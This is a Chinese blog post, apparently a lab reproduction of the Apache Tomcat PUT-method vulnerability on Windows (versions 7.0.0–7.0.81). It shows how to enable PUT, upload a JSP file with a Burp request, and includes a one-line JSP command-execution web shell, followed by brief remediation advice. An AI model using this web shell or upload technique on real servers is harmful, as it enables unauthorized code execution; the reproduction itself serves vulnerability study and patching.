远程代码执行

最新推荐文章于 2024-07-02 11:12:00 发布
最新推荐文章于 2024-07-02 11:12:00 发布
阅读量2.7k 收藏 1
点赞数
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41232519/article/details/107166596
版权

1、 漏洞简介及成因

Tomcat 运行在Windows 主机上,且启用了 HTTP PUT 请求方法,可通过构造的攻击请求向服务器上传包含任意代码的 JSP 文件,造成任意代码执行。

影响版本: Apache Tomcat 7.0.0 – 7.0.81

2、 漏洞复现

配置漏洞,开启put方法可上传文件功能。
tomcat文件夹下的/conf/web.xml文件插入:

<init-param>

           <param-name>readonly</param-name>

           <param-value>false</param-value>

     </init-param>

重启tomcat服务。
在这里插入图片描述
访问127.0.0.1:8080,burp抓包,send to Repeater,将请求方式改为PUT,创建一个122.jsp,并用%20转义空格字符。123.jsp内容为:

<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>

返回201,说明创建成功。在这里插入图片描述
访问127.0.0.1:8080/122.jsp?cmd=calc。

弹出计算器:在这里插入图片描述

3、 漏洞修复

1)检测当前版本是否在影响范围内,并禁用PUT方法。

2)更新并升级至最新版。

lnterpreter
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
用友NC BeanShell远程代码执行
09-07
# 用友NC BeanShell远程代码执行 # CNVD-2021-30167 ## 漏洞描述 用友NC是一款企业级管理软件,在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。用友 NC bsh.[servlet]...
远程代码执行漏洞
kali_Ma的博客
10-30 2048
发现data.headers中出现了x-real-ip:127.0.0.1 ,这是我们调用batch-requests插件传递的头信息,而此时系统默认的X-Real-IP为大写。在请求头覆盖中、因为 real_ip_hdr 为 X-Real-IP , 函数core.request.get_remote_clinte_ip()获取远程客户端ip、不能将 x-real-ip给覆盖。通过遍历表结构、获取到 real_ip_header 的值然后再赋值给real_ip_hdr。该值为在系统启动后、给定的默认值。
远程代码/命令执行(RCE)
hakksjss的博客
05-07 807
call_user_function_array(),参数一为回调函数、参数二为调用函数传递数组 $a=$_GET['a'];eval()、assert()、create_function()、call_user_function()、 call_user_function_array()、array_map、$a($b)动态函数(使用7.2以下测试)、正则 preg_grep。system()、exec()、shell_exec()、``等价于shell_exec()、popen、passthru。
kkFileView远程代码执行漏洞分析
qq_18193739的博客
04-23 1796
使用…/…/ 即可导致任意文件内容覆盖转换pdf是启动了LibreOffile 并执行 C:\Users\26927\Downloads\kkFileView-4.2.1\server\libreoffice\program\uno.py 脚本中内容导致RCE。
OpenSSH远程代码执行漏洞 (CVE-2024-6387)
最新发布
qq_33163046的博客
07-02 4529
OpenSSH是一套基于安全外壳(SSH)协议的安全网络实用程序,它提供强大的加密功能以确保隐私和安全的文件传输,使其成为远程服务器管理和安全数据通信的必备工具。OpenSSH 自 1995 年问世近 20 年来,首次出现了未经验证的远程执行(RCE)漏洞,攻击者可以提权至 root 最高权限,在不需要用户交互的情况下执行任意代码。该漏洞是由于OpenSSH服务器 (sshd) 中的信号处理程序竞争问题,未经身份验证的攻击者可以利用此漏洞在Linux系统上以root身份执行任意代码
fastjson远程代码执行漏洞
网安君的博客
03-29 5414
Fastjson 1.2.24 远程代码执行漏洞 漏洞说明 FastJson库是Java的一个Json库,其作用是将Java对象转换成json数据来表示,也可以将json数据转换成Java对象。在2017年3月15日,fastjson官方主动爆出fastjson在1.2.24及之前版本存在远程代码执行高危安全漏洞。攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。 前提条件 开启autotype 影响范围 fastjson 1.2.22-1.2.24 jdk 1.7,1.8版本 漏洞复现 由于Fastj
ThinkPHP5 远程代码执行
LYJ20010728的博客
08-16 2425
这里写目录标题漏洞概要初始配置漏洞利用漏洞分析漏洞修复攻击总结 漏洞概要 本次漏洞存在于 ThinkPHP 底层没有对控制器名进行很好的合法性校验,导致在未开启强制路由的情况下,用户可以调用任意类的任意方法,最终导致远程代码执行漏洞的产生 漏洞影响版本: 5.0.7<=ThinkPHP5<=5.0.22 、5.1.0<=ThinkPHP<=5.1.30 初始配置 获取测试环境代码 composer create-project --prefer-dist topthink
网路安全之远程代码执行漏洞
qq_52074678的博客
05-11 3177
一。什么是远程代码执行远程代码执行:Remote Code Execute 后台有时候也会把用户的输入作为代码的一部分进行执行,也就造成了远程代码执行漏洞,不管是使用了代码执行的函数,还是使用了不安全的反序列化等等。 因此,如果需要给前端用户提供操作类的接口,一定需要对接口输入的内容进行严格的判断,比如实施严格的白名单策略会是一个比较好的方法 远程命令执行:Remote Command Execute 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对
远程命令执行远程代码执行
ws1813004226的博客
05-22 5264
一、远程命令执行远程代码是怎样形成的? RCE(remote command/code execute)概述 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。 比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 而如
ThinkPHP5.0.23 远程代码执行漏洞
夜星空如海的博客
09-30 1832
ThinkPHP 是一款运用极广的 PHP 开发框架。其 5.0.23 以前的版本中,获取 method 的方法中没有正确处理方法名,导致攻击者可以调用 Request 类任意方法并构造利用链,从而导致远程代码执行漏洞。
Java RMI 远程代码执行漏洞
LuckySec
11-30 3325
Java RMI服务是远程方法调用,是J2SE的一部分,能够让程序员开发出基于JAVA的分布式应用。一个RMI对象是一个远程Java对象,可以从另一个Java虚拟机上(甚至跨过网络)调用它的方法,可以像调用本地JAVA对象的方法一样调用远程对象的方法,使分布在不同的JVM中的对象的外表和行为都像本地对象一样。在RMI的通信过程中,默认使用序列化来完成所有的交互,如果该服务器Java RMI端口(默认端口1099)对公网开放,且使用了存在漏洞的Apache Commo
向日葵远程代码执行poc.zip
04-05
向日葵远程代码执行漏洞(SUNBEAM Remote Code Execution)是网络安全领域中一个重要的安全隐患,主要涉及到向日葵远程控制软件。这个软件允许用户在不同的设备之间进行远程桌面控制、文件传输等一系列操作,但如果...
泛微E-Office10远程代码执行漏洞
05-06
泛微E-Office 10确实存在远程代码执行漏洞,这个漏洞**可能导致严重的安全后果**。 该漏洞的关键在于系统处理上传的PHAR文件时存在的缺陷。攻击者能够上传伪装的PHAR文件到服务器,利用PHP处理PHAR文件时自动进行的...
Apache Log4j2 远程代码执行漏洞检测工具
12-15
针对这个漏洞,开发出了专门的Apache Log4j2远程代码执行漏洞检测工具,这些工具包括针对Windows和Linux操作系统的版本。这些工具的主要目的是帮助管理员和安全专家迅速识别其环境中是否存在易受攻击的Log4j2实例。 ...
NodeJS远程代码执行
10-21
主要介绍了NodeJS远程代码执行方法的相关资料,需要的朋友可以参考下
目录穿越
qq_41232519的博客
07-06 4938
1、 漏洞简介及成因 Nginx反向代理,静态文件存储在/home/下,而访问时需要在url中输入files,配置文件中/files没有用/闭合,导致可以穿越至上层目录。 2、 漏洞复现 访问:http://192.168.139.128:8081/files/ 访问:http://192.168.139.128:8081/files…/ 成功实现目录穿越: 3、 漏洞修复 Nginx的配置文件/etc/nginx/conf.d/error2.conf的/files使用/闭合。 ...
登陆前端绕过
qq_41232519的博客
03-31 3440
1.输入一个正确的账号,密码随便输 2.查看返回包,看到这个很高兴,因为密码是错误的,所以我猜0是错误的,我们把它修改为1 3.跳到首页但是没登陆成功 4.然后用正确的密码登录,抓包,返回包多了 一个Set-Cookie,存在用户id,状态码为1,类容长度为30,然后放行 5.登录成功 6.在用错误的密码登陆时,伪造返回包就可以绕过验证直接登录 ...
iis远程代码执行漏洞
05-15
然而,IIS也存在一些安全漏洞,其中包括远程代码执行漏洞。 远程代码执行漏洞(Remote Code Execution,RCE)是指攻击者可以通过远程方式在目标服务器上执行任意代码,从而控制受害者服务器。IIS远程代码执行漏洞是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值